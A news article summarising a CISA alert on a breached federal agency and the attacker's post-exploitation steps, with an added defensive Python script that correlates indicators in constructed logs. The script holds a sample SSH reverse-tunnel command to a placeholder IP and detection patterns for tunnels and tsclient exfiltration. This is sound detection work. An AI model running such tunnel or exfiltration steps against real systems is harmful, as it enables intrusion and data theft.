The Cybersecurity and Infrastructure Security Agency (CISA), a division of the Department of Homeland Security, has issued a lengthy security alert in which it says that a federal agency was “compromised” by a “malicious cyber actor.” According to CISA, the agency was infiltrated in a cyberattack stemming from compromised credentials. After the threat actors gained access, CISA said they were able to install a “unique, multi-stage malware” that did not set off any intrusion detection systems.
The malware in question is complex, and the attackers exploited weaknesses in the unnamed agency’s firewall to gain persistent access. Through this, they established command and control and persistence via a Secure Shell (SSH) tunnel/reverse SOCKS proxy, and eventually created a local account.
CISA stated the following in its alert about the attacker’s actions post-exploitation:
The cyberthreat actor used the local account to:
- Browse directories on a victim file server.
- Copy a file from a user’s home directory to their locally mounted remote share.
- CISA analysts detected the cyber threat actor interacting with other files on users’ home directories but could not confirm whether they were exfiltrated.
- Create a reverse SMB SOCKS proxy that allowed connection between a cyber threat actor-controlled VPS and the victim organization’s file server.
- Interact with PowerShell module Invoke-TmpDavFS.psm.
- Exfiltrate data from an account directory and file server directory using tsclient.
- Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.
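As an added illustration, not taken from the article or from CISA’s alert, the following Python script shows how a defender could correlate the indicators in that list (local account creation, the Invoke-TmpDavFS module, tsclient share access, an SSH reverse tunnel, and Zip archive creation) per host. The event lines, host names and the `host|source|message` layout are constructed for this example and are simplified relative to real Windows and Sysmon logs.

```python
import re
from collections import defaultdict

# Constructed sample events (not from the CISA alert); fields: host|source|message
SAMPLE_EVENTS = """\
fs01|security|EventID=4720 A user account was created. Target: svc_backup2
fs01|powershell|EventID=4104 Import-Module .\\Invoke-TmpDavFS.psm1
fs01|security|EventID=5145 Share \\\\tsclient\\C accessed by svc_backup2
fs01|sysmon|EventID=1 ssh.exe -R 8080 -N -f user@203.0.113.10
fs01|sysmon|EventID=11 File created: C:\\Users\\svc_backup2\\export1.zip
ws07|security|EventID=4624 Logon Type 2 user jdoe
""".splitlines()

# Indicator patterns mirroring the post-exploitation steps listed in the alert
INDICATORS = {
    "local_account_created": re.compile(r"EventID=4720"),
    "tmpdavfs_module": re.compile(r"Invoke-TmpDavFS", re.I),
    "tsclient_share": re.compile(r"\\\\tsclient\\", re.I),      # UNC path \\tsclient\...
    "ssh_reverse_tunnel": re.compile(r"\bssh(\.exe)?\b.*\s-R\s"),  # ssh with a -R (remote forward)
    "archive_created": re.compile(r"\.zip\b", re.I),
}

def parse_event(line):
    """Split one constructed log line into its host, source and message fields."""
    host, source, message = line.split("|", 2)
    return {"host": host, "source": source, "message": message}

def match_indicators(events):
    """Return {host: set of indicator names} for every host with at least one hit."""
    hits = defaultdict(set)
    for ev in events:
        for name, pattern in INDICATORS.items():
            if pattern.search(ev["message"]):
                hits[ev["host"]].add(name)
    return hits

def hosts_to_triage(events, min_indicators=3):
    """Hosts where several distinct indicator categories co-occur; a single hit is noise."""
    hits = match_indicators(events)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= min_indicators}

if __name__ == "__main__":
    parsed = [parse_event(line) for line in SAMPLE_EVENTS]
    for host, names in hosts_to_triage(parsed).items():
        print(f"{host}: {', '.join(names)}")
```

Requiring several distinct categories on one host, rather than alerting on any single pattern, keeps ordinary SSH or Zip usage from paging an analyst while still surfacing the chain the alert describes.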
It is not known how the compromised credentials were obtained. There are a few likely possibilities, though these should be taken as speculation while the investigation is still ongoing. Password reuse is the most likely culprit, as it is a huge problem even within federal agencies that handle sensitive data. Another possibility is that the agency’s 2FA method was compromised.
Lastly, it is possible that the attacker had been monitoring the network before making this move. That is, given the firewall weaknesses CISA affirmed, the threat actor could have accessed the network remotely and used man-in-the-middle attacks together with the malware to gather sensitive information.
Featured image: CISA/NICCS